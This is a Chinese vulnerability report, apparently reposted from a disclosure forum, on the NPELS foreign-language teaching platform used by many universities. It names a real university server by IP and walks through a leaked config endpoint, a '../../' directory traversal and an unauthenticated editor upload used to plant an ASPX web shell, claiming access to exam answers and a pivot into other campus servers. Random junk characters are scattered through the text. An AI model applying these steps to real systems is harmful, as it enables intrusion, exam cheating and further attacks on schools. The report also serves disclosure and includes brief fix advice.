新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
, L) H8 e6 O% B" R- U# d
( F: b( v8 V/ ^% p) ]8 U详细说明：
; d5 y4 N' D7 @( I2 U( }
以南开大学的为例:
2 ?& C& P; Z  U- n1 E' X* ^http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
6 v8 {1 M: \. _<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
* j* n% t- N. u7 s- @# ?5 P</setting>
3 X. C/ O1 |& S. @4 u' b1 g. O( e及版本号
# m7 U0 h. v: r$ B, E<add key="TVersion" value="1, 0, 0, 2187">
" p$ Q  Z, q$ z</add>
- `1 g, g) Y% k& L. I8 d$ [直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
8 F: \4 H: `+ W) e# g& Lhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
7 c; ?# m  D) M; qhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

/ j0 }0 y; P! ?9 Q" d; F% K发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
+ a+ U* n- z; {% k0 A8 B上传后继续列目录找到木马地址直接访问即可

# f1 {& x) M% O. g& r8 eOOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
* X! p7 T- c3 t/ t& j' ^漏洞证明：

% P* M  x9 o4 i! _& u. z' v7 @列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
2 {4 N. m, T; A8 Z) G; w* T. j! w
上传木马：
' b9 e% \/ `3 Y; Q6 vhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
( O4 E2 x" @: A. @) z" h$ d) t8 ?
修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
' g' |- R  ]0 D7 e5 T& A' }) e( R并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
- R/ P) ~+ U! `/ _* r1 S